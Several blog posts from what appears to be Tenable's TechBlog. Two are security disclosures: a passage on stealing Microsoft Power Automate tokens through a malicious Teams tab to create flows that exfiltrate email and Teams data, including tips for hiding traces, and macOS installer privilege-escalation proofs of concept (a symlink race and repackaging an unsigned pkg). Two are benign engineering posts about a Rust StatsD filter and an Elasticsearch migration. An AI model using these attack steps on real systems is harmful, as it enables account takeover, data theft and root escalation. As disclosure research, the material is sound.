- Creating Power Automate flows on the victim user’s behalf which let us send and receive emails and Teams messages, and retrieve emails, messages, and files.
- Adding ourselves (or a group we’re in) to the owners of the flow.
- Having the victim user send an email to us containing any information we need to access the flows.

For our example we’re going to be showing pieces of a proof of concept which creates:

- Office 365 (for Outlook access) and Teams connectors
- A flow which lets us send emails as the user
- A flow which lets us get all Teams messages from channels the victim is in, and send messages on their behalf.

The api.flow.microsoft.com token bundle

The first stop on our quest to get access to everything the victim user holds dear is an api endpoint which will let us generate a handful of new access tokens. Sending an empty POST request to api.flow.microsoft.com/providers/Microsoft.ProcessSimple/environments/<environment>/users/me/onBehalfOfTokenBundle?api-version=2021-01-03 will let us grab the following tokens, with the following scopes (a request sketch follows the list):

the api.flow.microsoft.com token bundle

- graph.microsoft.com
  - scope: Contacts.Read Contacts.Read.Shared Group.Read.All TeamsAppInstallation.ReadWriteForTeam TeamsAppInstallation.ReadWriteSelfForChat User.Read User.ReadBasic.All
- graph.microsoft.net
  - scope: user_impersonation
- appservice.azure.com
  - scope: user_impersonation
- apihub.azure.com
  - scope: user_impersonation
- consent.msp.windows.net/logic-app-aad
  - scope: user_impersonation
- service.powerapps.com
  - scope: user_impersonation
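As a minimal sketch of that request in Python (assuming the stolen service.flow.microsoft.com token is presented as a standard Bearer token; the helper name and response handling are illustrative):

import requests

def get_token_bundle(flow_token, environment):
    url = ("https://api.flow.microsoft.com/providers/Microsoft.ProcessSimple"
           f"/environments/{environment}/users/me/onBehalfOfTokenBundle")
    resp = requests.post(url,
                         params={"api-version": "2021-01-03"},
                         headers={"Authorization": f"Bearer {flow_token}"})
    resp.raise_for_status()
    # Maps audiences (graph.microsoft.com, apihub.azure.com, ...) to tokens.
    return resp.json()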

Some of these tokens will become useful to us for constructing a larger attack (specifically the graph.microsoft.com and apihub.azure.com tokens).

Creating connectors and using first party logins

To create flows which let us take control of the victim’s services, we first need to create connectors for those services.

When a connector is created, a user can use a consent link to log in via a login.microsoft.com popup and grant permissions for the service for which the connector is being made (like Office 365, Teams, or SharePoint). Some connectors, however, come with a first party login url, which lets us bypass the regular interactive login process and authorize the connector using only the authorization tokens already gathered.

Creating a connector on the victim’s behalf takes only three requests, the final of which is a POST request to the first party login url, with the apihub.azure.com access token.

consenting to a connector with a stolen apihub.azure.com token

After this third request, the connector will be ready to use with any flow we create.
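Sketched in Python, that final consent request might look like the following. The first party login url (and any body parameters) come from the earlier connector-creation responses, which aren’t shown here, so treat this as illustrative:

import requests

def consent_first_party(first_party_login_url, apihub_token):
    # The final of the three requests: authorize the connector with the
    # stolen apihub.azure.com token instead of an interactive login.
    resp = requests.post(first_party_login_url,
                         headers={"Authorization": f"Bearer {apihub_token}"})
    resp.raise_for_status()
    return resp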

Creating a flow

Given the number of potential connector types, flow triggers, and actions we can perform, there are an endless number of ways that we could leverage this access. They range anywhere from simply forwarding every email which is received by the victim to the attacker, to only performing actions if a particular RSS feed updates, to creating REST endpoints that let us trigger any number of different actions in different services.

Additionally, if the organization happens to have premium Power Apps/Automate licensing, there are many more options available. It is honestly a very useful system (even if you’re not trying to exploit a whole Office 365 org).

For our attack, we will look at creating a flow which gives us access to endpoints which take JSON input, and perform the actions we want (send emails, teams messages, downloads files, etc). It is a noisier method, since it requires the attacker to send requests (authenticated as themselves), but it is convenient for demonstration. Not all flows require the attacker to be authenticated, or require user interaction.

Choosing flow triggers

A flow trigger is how a flow will be kicked off / knows when to begin. The three main types are automatic (when an email comes in, forward it to this address), instant (when a request is received at this endpoint, trigger the flow), and scheduled (run the flow every xyz seconds/minutes/hours).

The flow trigger we would prefer to use is the “when an HTTP request is received” trigger, which lets unauthenticated users trigger the flow, but that is a premium feature, so instead we will use the “Manually Trigger a Flow” trigger.

The trigger for our Microsoft Teams flow

This trigger requires authentication, but because it is assumed that the attacker is part of the organization this shouldn’t be a problem, and there are ways to limit information about who is running what flows.

Creating the flow logic

Flows allow you to create an automated process piece by piece, passing the outputs of one action to the next. For example, in the flow we created to let us get all Teams messages from a user, as well as send messages to any channel on their behalf, we determine what action to take, who to send the message to and other details depending on the input passed to the trigger.

Sending a message is quick and simple, but to retrieve all messages for all teams and channels, we first grab a list of all teams, then get each channel per team, then all messages per channel, and roll it up into one big gross ball and have the flow send it to the attacker via email.

The Teams flow for our PoC

Now that we have the flow designed, we need to know what the requests to create it, and to share it with ourselves as the attacker, look like using the tokens we’ve stolen. Luckily, in our case, it is just a couple of simple requests.

  1. A POST request, containing JSON object representing the flow, to create it and get the unique flow name.
  2. A GET request to grab the flow trigger uri, which will let us trigger the flow as the attacker once we have added ourselves to the owners group.

Adding a group to flow owners

For the trigger we chose, we need to be able to access the flow trigger uri, which can only be done by users who have access to the flow. As a result, we need to add a group we belong to (which seems less suspicious than just adding ourselves) to the flow owners.

The easiest choice here is some large, all-encompassing group, but in our case we’re using the group which is generated automatically for any team created in Microsoft Teams.

In order to grab the unique group id, we use the graph.microsoft.com token we stole from the victim earlier. We then modify the flow’s owners to include that group.

adding a group to the flow owners

Running the flow and sending ourselves the uris we need

In the proof of concept we’re building, we create a flow that lets us send emails on behalf of the victim user. This can be leveraged at the end of the attack to send ourselves the list of the flow trigger uris we need in order to perform the actions we want.

sending an email using the Outlook connector and flow we’ve created

For example, at the end of the email/Teams proof of concept we’re building, an email is sent on the victim’s behalf which sends us the flow trigger uris for both the Outlook and Teams flows we’ve created.

The message we receive from the victim with the flow trigger uris

Using these flow trigger uris, we can now read the victim’s emails and Teams messages, and send messages and emails on their behalf (despite being authenticated as Bad User).
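Invoking one of these trigger uris is just an authenticated POST with whatever JSON the flow’s trigger expects. A hedged sketch (the field names are illustrative, since they’re defined by the flow we created):

import requests

def trigger_flow(trigger_uri, attacker_token, payload):
    # Authenticated as the attacker, who is now in the flow's owners group.
    return requests.post(trigger_uri,
                         headers={"Authorization": f"Bearer {attacker_token}"},
                         json=payload)

# e.g. trigger_flow(teams_uri, token, {"action": "sendMessage", "channel": "...", "message": "..."})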

Putting it all together

The “TL;DR” shot: actions the malicious tab performs on opening

There are a number of ways in which we could build an attack with this vulnerability. It is likely that the best way would be to only use javascript on the malicious tab to steal the service.flow.microsoft.com token, and then perform the rest of the actions from an attacker-controlled server, so we reduce the traffic being generated by the victims and aren’t cut off by them navigating away from the tab.

For our quick and dirty PoC however, we just perform the whole attack with one big javascript section in our malicious tab. Roughly, the pseudocode for our attack looks like this (every helper name below is an illustrative placeholder rather than an actual function from the PoC):
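def malicious_tab_payload():
    # 1. Steal the service.flow.microsoft.com token via postMessage
    flow_token = get_token_via_postmessage("https://service.flow.microsoft.com")
    # 2. Trade it for the api.flow.microsoft.com token bundle
    bundle = get_token_bundle(flow_token, environment)
    # 3. Create connectors and consent to them with first party logins
    for service in ("office365", "teams"):
        connector = create_connector(flow_token, service)
        consent_first_party(bundle["apihub.azure.com"], connector)
    # 4. Create the flows
    email_flow = create_flow(flow_token, SEND_EMAIL_DEFINITION)
    teams_flow = create_flow(flow_token, TEAMS_MESSAGES_DEFINITION)
    # 5. Add the attacker's group to the owners and collect trigger uris
    group_id = get_team_group_id(bundle["graph.microsoft.com"])
    trigger_uris = []
    for flow in (email_flow, teams_flow):
        add_owner_group(flow_token, flow, group_id)
        trigger_uris.append(get_trigger_uri(flow_token, flow))
    # 6. Mail the trigger uris to the attacker, as the victim
    send_email_via_flow(email_flow, to=ATTACKER_ADDRESS, body=trigger_uris)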

Setting up a malicious tab with a payload like the one above will cause the victim to create connectors and flows, and add the attacker as an owner to them, as well as send them an email containing the flow trigger uris.

As a real example, here is a quick clip of a similar payload running and sending the attacker the victim’s Teams messages, and letting the attacker send a message to a private team masquerading as the victim.

stealing and sending Teams messages

Considerations for the attacker

If you’ve gone through the above and thought “cool, but it would be really easy for an admin to determine who is using these flows maliciously,” you’d be correct. However, there are a number of steps one could take to limit the exposure of the attacking user if a similar attack is being carried out in a penetration test.

  • Flows allow you to specify whether the inputs and outputs to each action should be kept secret / scrubbed from the flow’s run history. This means that it would be harder to observe what data is being taken, and where it is being sent.
  • Not all flows require the user to make authenticated requests to trigger. There are low and slow methods, like having flows trigger on an RSS feed update (30 minute minimum period), on a schedule, or automatically (for example: when a new email comes in from any account, read the email body and perform those actions).
  • Running the attack as one long javascript payload isn’t ideal and takes too long in real situations. Just grabbing the service.flow.microsoft.com token and conducting the rest of the attack from an attacker-controlled machine would be much less conspicuous.
  • Flows can be used to creatively cover an attacker’s tracks. For example, if you exfiltrate data via email in a flow, you can add a final step which deletes any emails sent to the attacker’s mail from the Sent Items folder.

Considerations for org administrators

While it may be difficult to determine who in a team has set up a malicious tab, or what user is running the flows (if the inputs/outputs have been made secret), there is a potential indicator to identify whether a user has had malicious flows run on their behalf.

When a user logs into make.powerapps.com or flow.microsoft.com to create a flow, a Microsoft Power Automate free license is automatically added to their set of licenses (if they didn’t already have one assigned to them). However, when flows are created on a user’s behalf by a malicious tab, they don’t have the license assigned to them. This license status can be cross-referenced with which users have flows created under their name at admin.powerplatform.microsoft.com.

organization admin portal

Notice that Bad User has logged into the flow.microsoft.com web interface, but Good User, despite having flows in their name listed in admin.powerplatform.microsoft.com, does not show as having a license for Power Automate. This could indicate that the flows were not created intentionally by Good User.

Luckily, the attack is limited to authenticated users within a Teams organization who have the ability to create Power Apps tabs, which means it can’t just be exploited by an untrusted/unauthenticated attacker. However, the permission to create these tabs is enabled by default, so it may be a good idea to consider limiting apps by default and enable them on request.

Takeaways

While that was a long and not quite straightforward attack, the potential impact of such an attack could be huge, especially if it happens to hit an organization administrator. That such a small initial bug (the improper validation of the make.powerapps.com domain) could be traded up until an attacker is exfiltrating emails, Teams messages, and OneDrive and SharePoint files is definitely concerning. It means that even a small bug in a not-so-common service like Microsoft Power Apps could lead to the compromise of many other services by way of token bundles and first party logins for connectors.

So if you happen to find a small bug in one service, see how far you can take it and see if you can trade a small bug for a big impact. There are likely other creative and serious potential attacks we didn’t explore with all of the potential access tokens we were able to steal. Let me know if you spot one 🙂.

Thanks for reading!



More macOS Installer Flaws

3 June 2021 at 13:02

Back in December, we wrote about attacking macOS installers. Over the last couple of months, as my team looked into other targets, we kept an eye on the installers of applications we were using and interacting with regularly. During our research, we noticed yet another of the aforementioned flaws in the Microsoft Teams installer and in the process of auditing it, discovered another generalized flaw with macOS package installers.

Frustrated by the prevalence of these issues, we decided to write them up and make separate reports to both Apple and Microsoft. We wrote to Apple to recommend implementing a fix similar to what they did for CVE-2020-9817 and explained the additional LPE mechanism discovered. We wrote to Microsoft to recommend a fix for the flaw in their installer.

Both companies have rejected these submissions and suggestions. Below you will find full explanations of these flaws as well as proofs-of-concept that can be integrated into your existing post-exploitation arsenals.

Attack Surface

To recap from the previous blog, macOS installers have a variety of convenience features that allow developers to customize the installation process for their applications. Most notable of these features are preinstall and postinstall scripts. These are scripts that run before and after the actual application files are copied to their final destination on a given system.

If the installer itself requires elevated privileges for any reason, such as setting up a system-level Launch Daemon for an auto-updater service, the installer will prompt the user for permission to elevate privileges to root. There is also the case of unattended installations automatically doing this, but we will not be covering that in this post.

The primary issue being discussed here occurs when these scripts — running as root — read from and write to locations that a normal, lower-privileged user has control over.

Issue 1: Usage of Insecure Directories During Elevated Installations

In July 2020, NCC Group posted their advisory for CVE-2020-9817. In this advisory, they discuss an issue where files extracted to Installer Sandbox directories retained the permissions of a lower-privileged user, even when the installer itself was running with root privileges. This means that any local attacker (local meaning code execution, not necessarily physical access) could modify these files and potentially escalate to root privileges during the installation process.

NCC Group conceded that these issues could be mitigated by individual developers, but chose to report the issue to Apple to suggest a more holistic solution. Apple appears to have agreed, provided a fix in HT211170, and assigned a CVE identifier.

Apple’s solution was simple: They modified files extracted to an installer sandbox to obtain the permissions of the user the installer is currently running as. This means that lower privileged users would not be able to modify these files during the installation process and influence actions performed by root.

Similar to the sandbox issue, as noted in our previous blog post, it isn’t uncommon for developers to use other less-secure directories during the installation process. The most common directories we’ve come across that fit this bill are /tmp and /Applications, which both have read/write access for standard users.

Let’s use Microsoft Teams as yet another example of this. During the installation process for Teams, the application contents are moved to /Applications as normal. The postinstall script creates a system-level Launch Daemon that points to the TeamsUpdaterDaemon application (/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon), which will run with root permissions. The issue is that if a local attacker is able to create the /Applications/Microsoft Teams.app directory tree prior to installation, they can overwrite the TeamsUpdaterDaemon application with their own custom payload during the installation process, which will be run as a Launch Daemon, and thus give the attacker root permissions. This is possible because while the installation scripts do indeed change the write permissions on this file to root-only, creating this directory tree in advance thwarts this permission change because of the open nature of /Applications.

The following demonstrates a quick proof of concept:

# Prep Steps Before Installing
/tmp ❯❯❯ mkdir -p "/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/"
# Just before installing, have this running. Inelegant, but it works for demonstration purposes.
# Payload can be whatever. It won't spawn a GUI, though, so a custom dropper or other application would be necessary.
/tmp ❯❯❯ while true; do
ln -f -F -s /tmp/payload "/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon";
done
# Run installer. Wait for the TeamsUpdaterDaemon to be called.
# Run installer. Wait for the TeamUpdaterDaemon to be called.

The above creates a symlink to an arbitrary payload at the file path used in the postinstall script to create the Launch Daemon. During the installation process, this directory is owned by the lower-privileged user, meaning they can modify the files placed here for a short period of time before the installation scripts change the permissions to allow only root to modify them.

In our report to Microsoft, we recommended verifying the integrity of the TeamsUpdaterDaemon prior to creating the Launch Daemon entry, or using the preinstall script to verify permissions on the /Applications/Microsoft Teams.app directory.

The Microsoft Teams vulnerability triage team has been met with criticism over their handling of vulnerability disclosures these last couple of years. We’d expected that their recent inclusion in Pwn2Own showcased vast improvements in this area, but unfortunately, their communications in this disclosure as well as other disclosures we’ve recently made regarding their products demonstrate that this is not the case.

Full thread: https://mobile.twitter.com/EyalItkin/status/1395278749805985792
Full thread: https://twitter.com/mattaustin/status/1200891624298954752
Full thread: https://twitter.com/MalwareTechBlog/status/1254752591931535360

In response to our disclosure report, Microsoft stated that this was a non-issue because /Applications requires root privileges to write to. We pointed out that this was not true and that if it was, it would mean the installation of any application would require elevated privileges, which is clearly not the case.

We received a response stating that they would review the information again. A few days later our ticket was closed with no reason or response given. After some prodding, the triage team finally stated that they were still unable to confirm that /Applications could be written to without root privileges. Microsoft has since stated that they have no plans to release any immediate fix for this issue.

Apple’s response was different. They stated that they did not consider this a security concern and that mitigations for this sort of issue were best left up to individual developers. While this is a totally valid response and we understand their position, we requested information regarding the difference in treatment from CVE-2020-9817. Apple did not provide a reason or explanation.

Issue 2: Bypassing Gatekeeper and Code Signing Requirements

During our research, we also discovered a way to bypass Gatekeeper and code signing requirements for package installers.

According to Gatekeeper documentation, packages downloaded from the internet or created from other possibly untrusted sources are supposed to have their signatures validated and a prompt is supposed to appear to authorize the opening of the installer. See the following quote for Apple’s explanation:

When a user downloads and opens an app, a plug-in, or an installer package from outside the App Store, Gatekeeper verifies that the software is from an identified developer, is notarized by Apple to be free of known malicious content, and hasn’t been altered. Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.

In the case of downloading a package from the internet, we can observe that modifying the package will trigger an alert to the user upon opening it claiming that it has failed signature validation due to being modified or corrupted.

Failed signature validation for a modified package

If we duplicate the package, however, we can modify the contained files at will and repackage it sans signature. Most users will not notice that the installer is no longer signed (the lock symbol in the upper right-hand corner of the installer dialog will be missing) since the remainder of the assets used in the installer will look as expected. This newly modified package will also run without being caught or validated by Gatekeeper (Note: The applications installed will still be checked by Gatekeeper when they are run post-installation. The issue presented here regards the scripts run by the installer.) and could allow malware or some other malicious actor to achieve privilege escalation to root. Additionally, this process can be completely automated by monitoring for .pkg downloads and abusing the fact that all .pkg files follow the same general format and structure.
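To illustrate that automation point, here’s a minimal polling sketch in Python. Everything here is an assumption about how one might wire it up; the modify_package() body would be the pkgutil expand/patch/flatten sequence shown below.

import os
import time

WATCH_DIR = os.path.expanduser("~/Downloads")

def modify_package(path):
    # pkgutil --expand, patch Scripts/postinstall, pkgutil --flatten (see below)
    pass

seen = set(os.listdir(WATCH_DIR))
while True:
    # Act on any .pkg file that appears in the watched directory.
    for name in set(os.listdir(WATCH_DIR)) - seen:
        if name.endswith(".pkg"):
            modify_package(os.path.join(WATCH_DIR, name))
    seen = set(os.listdir(WATCH_DIR))
    time.sleep(1)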

The below instructions can be used to demonstrate this process using the Microsoft Teams installer. Please note that this issue is not specific to this installer/product and can be generalized and automated to work with any arbitrary installer.

To start, download the Microsoft Teams installation package here: https://www.microsoft.com/en-us/microsoft-teams/download-app#desktopAppDownloadregion

When downloaded, the binary should appear in the user’s Downloads folder (~/Downloads). Before running the installer, open a Terminal session and run the following commands:

# Rename the package
yes | mv ~/Downloads/Teams_osx.pkg ~/Downloads/old.pkg
# Extract package contents
pkgutil --expand ~/Downloads/old.pkg ~/Downloads/extract
# Modify the post installation script used by the installer
mv ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
echo "#!/usr/bin/env sh\nid > ~/Downloads/exploit\n$(cat ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak)" > ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
rm -f ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
chmod +x ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
# Repackage and rename the installer as expected
pkgutil -f --flatten ~/Downloads/extract ~/Downloads/Teams_osx.pkg

When a user runs this newly created package, it will operate exactly as expected from the perspective of the end-user. Post-installation, however, we can see that the postinstall script run during installation has created a new file at ~/Downloads/exploit that contains the output of the id command as run by the root user, demonstrating successful privilege escalation.

Demo of above proof of concept

When we reported the above to Apple, this was the response we received:

Based on the steps provided, it appears you are reporting Gatekeeper does not apply to a package created locally. This is expected behavior.

We confirmed that this is indeed what we were reporting and requested additional information based on the Gatekeeper documentation available:

Apple explained that their initial explanation was faulty, but maintained that Gatekeeper acted as expected in the provided scenario.

Essentially, they state that locally created packages are not checked for malicious content by Gatekeeper, nor are they required to be signed. This means that even packages that require root privileges to run can be copied, modified, and recreated locally in order to bypass security mechanisms. This allows an attacker with local access to man-in-the-middle package downloads and escalate privileges to root when a package that runs as root is executed.

Conclusion and Mitigations

So, are these flaws actually a big deal? From a realistic risk standpoint, no, not really. This is just another tool in an already stuffed post-exploitation toolbox. That said, it should be noted that similar installer-based attack vectors are actively being exploited, as is the case in recent SolarWinds news.

From a triage standpoint, however, this is absolutely a big deal for a couple of reasons:

  1. Apple has put so much effort over the last few iterations of macOS into baseline security measures that it seems counterproductive to their development goals to ignore basic issues such as these (especially issues they’ve already implemented similar fixes for).
  2. It demonstrates how much emphasis some vendors place on making issues go away rather than solving them.

We understand that vulnerability triage teams are absolutely bombarded with half-baked vulnerability reports, but becoming unresponsive during the disclosure process, overusing canned messaging, or simply giving incorrect reasons should not be the norm. It highlights many of the frustrations researchers experience when interacting with these larger organizations.

We want to point out that we do not blame any single organization or individual here and acknowledge that there may be bigger things going on behind the scenes that we are not privy to. It’s also totally possible that our reports or explanations were hot garbage and our points were not clearly made. In either case, though, the vendors’ communications should have been clearer about what information was needed to clarify the issues before the reports were simply discarded.

Circling back to the issues at hand, what can users do to protect themselves? It’s impractical for everyone to manually audit each and every installer they interact with. The occasional spot check with Suspicious Package, which shows all scripts executed when an installer package is run, never hurts. In general, though, paying attention to proper code signatures (look for the lock in the upper right-hand corner of the installer) goes a long way.

For developers, pay special attention to the directories and files being used during the installation process when creating distribution packages. In general, it’s best practice to use an installer sandbox whenever possible. When that isn’t possible, verifying the integrity of files as well as enforcing proper permissions on the directories and files being operated on is enough to mitigate these issues.

Further details on these discoveries can be found in TRA-2021–19, TRA-2021–20, and TRA-2021–21.


More macOS Installer Flaws was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Optimizing 700 CPUs Away With Rust

By: Alan Ning
6 May 2021 at 15:31

In Tenable.io, we are heavy users of Datadog custom metrics. Millions of metrics are sent through Dogstatsd, providing deep insights into the complex platform. As the platform grew, we found that a significant number of metrics sent by legacy apps were obsolete. We tried to hunt down these obsolete metrics in the codebase, but modifying legacy applications was extremely time consuming and risky.

To address this, we deployed a StatsD filter as a Datadog agent sidecar to filter out unnecessary metrics. The filter is a simple UDP datagram forwarder written in Node.js (sample, not actual code). We chose Node.js because, in our environment, it offered the best combination of network performance and speed to production. We were able to implement, test and deploy this change across all of the T.io platform within a week.
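
Conceptually, the filter’s hot path is tiny. The following is a minimal C sketch of a receive-filter-forward loop, not the actual implementation; the prefixes and ports are made-up placeholders, and a real filter would also split datagrams containing multiple newline-separated metrics:

#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>

int main(void)
{
    /* Hypothetical prefixes of the obsolete metrics to drop. */
    const char *filtered_prefixes[] = { "legacy.", "unused." };
    char buf[65536];

    int in_fd  = socket(AF_INET, SOCK_DGRAM, 0);
    int out_fd = socket(AF_INET, SOCK_DGRAM, 0);

    struct sockaddr_in in_addr = { 0 }, out_addr = { 0 };
    in_addr.sin_family = AF_INET;
    in_addr.sin_port = htons(8125);               /* listen port (placeholder) */
    in_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    bind(in_fd, (struct sockaddr *)&in_addr, sizeof(in_addr));

    out_addr.sin_family = AF_INET;
    out_addr.sin_port = htons(8135);              /* DogStatsD port (placeholder) */
    out_addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    for (;;)
    {
        ssize_t n = recvfrom(in_fd, buf, sizeof(buf), 0, NULL, NULL);
        if (n <= 0)
            continue;

        /* StatsD metrics start with the metric name ("name:value|type"),
           so a prefix match on the datagram is enough for this sketch. */
        int drop = 0;
        for (size_t i = 0; i < sizeof(filtered_prefixes) / sizeof(filtered_prefixes[0]); i++)
            if (strncmp(buf, filtered_prefixes[i], strlen(filtered_prefixes[i])) == 0)
                drop = 1;

        if (!drop)
            sendto(out_fd, buf, n, 0, (struct sockaddr *)&out_addr, sizeof(out_addr));
    }
}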

statsd-filter-proxy is deployed as a sidecar to datadog-agent, filtering all StatsD traffic prior to DogstatsD.

While this worked for many months, performance issues began to crop up. As the platform continued to scale up, we were sending more and more metrics through the filter. During the first quarter of 2021, we added over 1.4 million new metrics as an effort to improve our observability. The filters needed more CPU resources to keep up with the new metrics. At this scale, even a minor inefficiency can lead to large wastage. Over time, we were consuming over 1000 CPUs and 400GB of memory on these filters. The overhead had become unacceptable.

We analyzed the performance metrics and decided to rewrite the filter in a more efficient language. We chose Rust for its high performance and safety characteristics. (See our other post on Rust evaluations) The source code of the new Rust-based filter is available here.

The Rust-based filter is much more efficient than the original implementation. With the ability to fully manage the heap allocations, Rust’s memory allocation for handling each datagram is kept to a minimum. This means that the Rust-based filter only needs a few MB of memory to operate. As a result, we saw a 75% reduction in CPU usage and a 95% reduction in memory usage in production.

Per pod, average CPU reduced from 800m to 200m core
Per pod, average memory reduced from 70MB to 5MB.

In addition to reclaiming compute resources, the latency per packet has also dropped by over 50%. While latency isn’t a key performance indicator for this application, it is rewarding to see that we are running twice as fast for a fraction of the resources.

With this small change, we were able to optimize away over 700 CPU and 300GB of memory. This was all implemented, tested and deployed in a single sprint (two weeks). Once the new filter was deployed, we were able to confirm the resource reduction in Datadog metrics.

CPU / Memory usage dropped drastically following the deployment

Source: https://github.com/tenable/statsd-filter-proxy-rs

TL;DR:

  • Replaced the JS-based StatsD filter with Rust and saw huge performance improvements.
  • At scale, even a small optimization can result in a huge impact.

Optimizing 700 CPUs Away With Rust was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Scaling Tenable.io — From Site to Cell

By: Alan Ning
4 March 2021 at 15:46

Scaling Tenable.io — From Site to Cell

Since the inception of Tenable.io, keeping up with data pressure has been a continuous challenge. This data pressure comes from two dimensions: the growth of the customer base and the growth of usage from each customer. This challenge has been most notable in Elasticsearch, since it is one of the most important stages in our petabyte-scale SaaS pipeline.

When customers run vulnerability scans, the Nessus scanners upload the scan data to Tenable.io. There, the data is broken down into documents detailing vulnerability information, including data such as asset information and cyber exposure details. These documents are then aggregated into an Elasticsearch index. However, when a cluster reached the scale of hundreds of nodes, the team discovered that further horizontal scaling would affect overall stability. We would encounter more hot shard problems, leading to uneven load across the index and a degraded user experience. This post will detail the re-architecture that both solved this scaling problem and achieved massive performance improvements for our customers.

Incremental Scaling from Site to Cell

Tenable.io scales by sites, where each site handles requests for a group of customers.

Each point of presence, called a site, contains a multi-tenant Elasticsearch instance used by geographically similar customers. As data pressure increases, however, horizontal scaling causes instability in the Elasticsearch cluster, which in turn causes instability at the site level.

To overcome this challenge, our overall strategy was to break out the site-wide (monolith) Elasticsearch cluster into multiple smaller, more manageable clusters. We call these smaller clusters cells. The rule is simple: If a customer has over 100 million documents, they will be isolated into their own cell. Smaller customers will be moved to one of the general population (GP) clusters. We came up with a technique to achieve zero downtime migration with massive performance gains.

Migrate from site to cell, where customers with large datasets may get their own Elasticsearch cluster.

Request Routing and Backfill

To achieve a zero downtime migration, we implemented two key pieces of software:

  1. An Elasticsearch proxy that can:
     • Transparently proxy any Elasticsearch request to any Elasticsearch cluster
     • Intelligently tee any write request (e.g. Index, Bulk) to one or more clusters

  2. A Spark job that can:
     • Query specific customer data
     • Read the Spark dataframes from the monolith cluster using parallelized scrolls
     • Map the Spark dataframes from the monolith cluster directly to the cell-based cluster

To start, we reconfigured micro-services to communicate with Elasticsearch through the proxy. Based on the targeted customer (more on this later), the proxy performed dual write to the old monolith cluster and the new cell-based cluster. Once the dual write began, all new documents started flowing to the new cell cluster. For all older documents, we ran a Spark job to pull old data from the monolith cluster to the new cell cluster. Finally, after the Spark job completed, we cut all new queries over to the new cell cluster.

A zero downtime backfill process. Step 1: start dual write. Step 2: Backfill old data. Step 3: Cutover reads.

Elasticsearch Proxy

With the cell architecture, we see a future where migrating customers from one Elasticsearch cluster to another is a common event. Customers in a multi-tenant cluster can easily outgrow the cluster’s capacity over time and require migration to other clusters. In addition, we need to reindex the data from time to time to adjust immutable settings (e.g. shard count). With this in mind, we want to make sure this type of migration is completely transparent to all the micro services. This is why we built a proxy to encapsulate all customer routing logic such that all data allocation is completely transparent to client services.

The Elasticsearch proxy encapsulates all customer routing logic, hiding it from all other services.

For the proxy to be able to route requests to the correct Elasticsearch clusters, it needs the customer ID to be sent along with each request. To achieve this, we injected an X-CUSTOMER-ID HTTP header into each search and index request. The proxy inspected the X-CUSTOMER-ID header in each request, looked up the customer-to-cluster mapping, and forwarded the request on to the correct cluster.

While search and index requests always target a single customer, a bulk request contains a large number of documents for numerous customers. A single X-CUSTOMER-ID HTTP header would not provide sufficient routing information for the request. To overcome this, we found an interesting hack in Elasticsearch.

A bulk request body is encoded in a newline-delimited JSON (NDJSON) structure. Each action line is an operation to be performed on a document. The following example closely follows the one given in the Elasticsearch documentation:
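
{ "index" : { "_index" : "test", "_id" : "1" } }
{ "field1" : "value1" }
{ "delete" : { "_index" : "test", "_id" : "2" } }
{ "create" : { "_index" : "test", "_id" : "3" } }
{ "field1" : "value3" }
{ "update" : { "_id" : "1", "_index" : "test" } }
{ "doc" : { "field2" : "value2" } }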

We found that within an action line, you can append any amount of metadata to the line as long as it is outside the action body. Elasticsearch seems to accept the request and ignore the extra content with no side effects (verified with ES2 to ES7). With this technique, we modified all clients of the Summary index to append customer IDs to every action.

With this modification, the proxy has enough information to break down a bulk request into subrequests for each customer.
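
As a purely illustrative sketch of the technique (the x-customer-id key is a hypothetical name, not the actual metadata format we used), an annotated action line might look like:

{ "index" : { "_index" : "summary", "_id" : "1" } } { "x-customer-id" : "cust-123" }
{ "field1" : "value1" }

The proxy can then strip the trailing metadata, group the action/document pairs by customer, and issue one bulk subrequest per target cluster.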

Spark Backfill

To backfill old data after dual writes were enabled, we used AWS EMR with the elasticsearch-hadoop SDK to perform parallel scrolls against every shard from the source index. As Spark retrieves the data in the Resilient Distributed Dataset (RDD) format, the same RDD can be written directly to the destination index. Since we’re backfilling old data, we want to make sure we don’t overwrite anything that’s already been written. To accomplish this, we set es.write.operation to “create”. (Look for an upcoming blog post about how Tenable uses Kotlin with EMR and Spark!)

Here’s some high level sample code:

To optimize the backfill performance, we performed steps similar to the ones taken by SoundCloud. Specifically, we found the following settings the most impactful:

  • Setting the index replica to 0
  • Setting the refresh interval to 5 minutes

However, since we are migrating data using a live production system, our primary goal is to minimize performance impact. In the end, we settled on indexing 9000 documents per second as the sweet spot. At this rate, migrating a large customer takes 10–20 hours, which is fast enough for this effort.

Performance Improvement

Since we started this effort, we have noticed drastic performance improvements. Elasticsearch scroll speed saw up to a 15x improvement, and query latency decreased by up to several orders of magnitude.

The chart below is a large scroll request that goes through millions of vulnerabilities. Prior to the cell migration, it could take over 24 hours to run the full scroll. The scroll from the monolith cluster suffered slow performance due to frequent resource contention with other customers, and it was further slowed by our fairness algorithm’s throttling. After the customer was migrated to the cell cluster, the same scroll request completed in just over 1.5 hours. Not only is this a large improvement for this customer, but other customers also reap the benefits of the decrease in contention.

In Summary

Our change in scaling strategy has resulted in large performance improvements for the Tenable.io platform. The new request routing layer and backfill process gave us new powerful tools to shard customer data. The resharding process is streamlined to an easy, safe and zero downtime operation.

Overall, the team is thrilled with the end result. It took a lot of ingenuity, dedication, and teamwork to execute a zero downtime migration of this scale.

tl;dr:

  • Exponential customer growth on the Tenable.io platform led to a huge increase in the data stored in a monolithic Elasticsearch cluster to the point where it was becoming a challenge to scale further with the existing architecture.
  • We broke down the site monolith cluster to cell clusters to improve performance.
  • We migrated customer data through a custom proxy and Spark job, all with zero downtime.
